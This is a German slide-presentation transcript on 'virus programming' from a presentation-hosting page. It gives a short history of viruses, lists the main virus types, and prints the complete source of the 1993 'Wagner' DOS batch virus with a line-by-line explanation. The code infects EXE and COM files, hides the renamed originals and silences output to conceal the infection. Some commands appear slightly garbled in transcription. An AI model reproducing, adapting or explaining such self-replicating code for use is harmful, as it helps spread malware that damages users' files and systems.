Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

Viern - Progammierung. Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile.

Ähnliche Präsentationen


Präsentation zum Thema: "Viern - Progammierung. Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile."—  Präsentation transkript:

1 Viern - Progammierung

2 Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile haben sich die Programmierer aber immer bessere Tricks ausgedacht, um den fiesen Antivirenprogrammen zu entgehen. Ein Virus ist eigentlich immer nach folgendem Schema aufgebaut: 1.) Infektionsroutine, die für die Vermehrung sorgt 2.) Aktivierung. Hier wird festgelegt, wann sich der Virus meldet 3.) Handlung. Was soll er tun, HD löschen, Grüße ausrichten...? Das Ziel eines Virus- Programmierers ist meist nicht Schaden anzurichten, sondern, dass sich sein Virus oder möglichst weit verbreitet.

3 Man unterscheidet folgende Virentypen: Dateiviren : Sie infizieren meistens COM oder EXE Dateien, seltener jedoch BAT Dateien. Sie überschreiben Teile des Programms oder hängen sich an dessen Ende und werden bei jedem Programmstart aktiv und suchen dann nach weiteren Wirten. Makroviren : Makroviren nutzen die Makrosprache von Exel und Word und starten automatisch beim öffnen einer infizierten Datei. Etwa 70% aller heutigen Viren sind Makroviren. Hoax Viren : Dies sind keine wirklichen Viren, aber Warnungen vor Phantasieviren, die alles mögliche zerstören können. Allerdings werden diese Nachrichten gerne weiter versand, um auch Freunde vor dem ach so bösen Virus zu waren und verbreiten sich teilweise recht stark.

4 Batch –Viren Dies ist ein recht einfacher Virus, der sogenannte Wagner Virus der von Black Wolf 1993 in Virology 101 präsentiert wurde off ctty nul for %f in (*.exe *.com) do set A=%f if %A%==COMMAND.COM set A= rename %A% V%A% if not exist V%A% goto end attrib +h V%A% copy %0.bat %A% attrib +r %A% ren %A% *.bat set A= :end ctty exist V%0.com V%0.com %1 %2 exist V%0.exe V%0.exe %1 %2 %3

5 Die Befehle des Wagner – Virus off Dieser Befehl bewirkt, dass die Befehle des Programmes beim ausführen nicht angezeigt werden. ctty nul Hier werden alle Ausgaben ins Nichts geleitet. So das der 'Benutzer' nicht sieht, dass Dateien kopiert wurden. for %f in (*.exe *.com) do set A=%f Hier werden alle EXE und COM Dateien und schreibt jede Datei in die Variable A. Das bedeutet, dass am Ende die letzte, noch nicht infizierte Datei in der Variable A gespeichert wird. if %A%==COMMAND.COM set A= Falls A die Datei Command.COM enthaelt, wird A Null gesetzt

6 Die Befehle des Wagner – Virus II rename %A% V%A% Die gefundene Datei wird umbenannt in Vname if not exist V%A% goto end Sollte das Umbenennen schiefgegangen sein, wird zur Stelle :end gesprungen und beendet attrib +h V%A% Die umbenannte Datei wird versteckt und somit nur durch Parameter mit dem Befehl dir /a:h sichtbar, auserdem wird sie bei einer erneuten Ausfuehrung des Programmes nicht noch einmal umbenannt. copy %0.bat %A% Der Virus (%0%) wird an die Stelle der COM Datei kopiert

7 Die Befehle Des Wagner – Virus III attrib +r %A% Nun wird die Datei vor dem Ueberschreiben geschuetzt ren %A% *.bat Nun noch eine Umbenennung in eine BAT Datei set A= Der Parameter A wird wieder geleert, um keine Spuren zu hinterlassen :end Hierher wird mit goto end gesprungen ctty con Die Ausgabe wird wieder auf den Bildschirm exist V%0.com V%0.com %1 %2 %3 Falls die Ersetzte Datei eine COM Datei war, wird diese nun exist V%0.exe V%0.exe %1 %2 %3 wie eben nur mit EXE Dateien


Herunterladen ppt "Viern - Progammierung. Im Jahre 1981 traten die ersten Viren auf, die noch sehr einfach gestrickt waren, und nicht sehr destruktiv waren. Mittlerweile."

Ähnliche Präsentationen


Google-Anzeigen